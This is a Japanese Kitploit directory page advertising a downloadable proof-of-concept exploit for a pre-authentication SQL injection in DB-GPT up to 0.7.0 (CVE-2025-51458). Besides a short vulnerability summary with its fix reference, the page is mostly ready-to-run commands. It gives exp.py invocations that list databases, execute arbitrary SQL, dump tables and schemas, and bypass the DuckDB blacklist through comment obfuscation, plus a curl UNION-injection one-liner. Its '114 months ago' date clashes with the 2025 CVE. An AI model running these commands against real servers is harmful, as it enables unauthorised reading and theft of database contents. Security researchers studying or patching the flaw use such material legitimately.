Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-51458-exp — CVE-2025-51458 - DB-GPT 認証前SQLインジェクションPoC | Kitploit
ツール/GitHubGitHub/q1uf3ng/cve-2025-51458-exp
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストデータベースセキュリティ
GitHubq1uf3ng/cve-2025-51458-exp

CVE-2025-51458-exp

CVE-2025-51458 - DB-GPT 認証前SQLインジェクションPoC

リポジトリを見る
114ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-51458-exp

DB-GPT <= 0.7.0 における事前認証 SQL インジェクション

概要

/api/v1/editor/sql/run および /api/v1/editor/chart/run エンドポイントは、認証なしで任意の SQL を受け入れます。sanitize_sql ブラックリストは DuckDB のみを対象としており、MySQL、PostgreSQL、SQLite の接続ではフィルタリングなしで生のユーザー入力を受け取ります。DuckDB のブラックリスト自体も、コメント難読化 (SEL/**/ECT) によってバイパスできます。

これは CVE-2024-10835 および CVE-2024-10901 のバイパスです。

  • CVSS: 6.5(中)
  • 種別: CWE-89(SQL インジェクション)
  • 認証: 不要(事前認証)
  • 影響を受けるバージョン: DB-GPT <= 0.7.0
  • 修正: PR #2650

使用方法

root@kitploit:~
# List databases
python3 exp.py http://target:5670 --list-dbs

# Execute SQL
python3 exp.py http://target:5670 <db_name> --sql "SELECT VERSION()"

# Dump tables
python3 exp.py http://target:5670 <db_name> --dump-tables

# Dump schema
python3 exp.py http://target:5670 <db_name> --dump-db

# DuckDB bypass
python3 exp.py http://target:5670 <db_name> --duckdb-bypass --sql "SELECT CURRENT_SETTING('access_mode')"

# Interactive mode
python3 exp.py http://target:5670 <db_name>

クイック PoC

root@kitploit:~
curl -X POST "http://target:5670/api/v1/editor/sql/run" \
  -H "Content-Type: application/json" \
  -d '{"db_name":"test_db","sql":"SELECT 1 UNION ALL SELECT table_name FROM information_schema.tables--"}'

参照

  • NVD
  • Gecko Security Blog
  • Fix PR #2650
ツールをダウンロード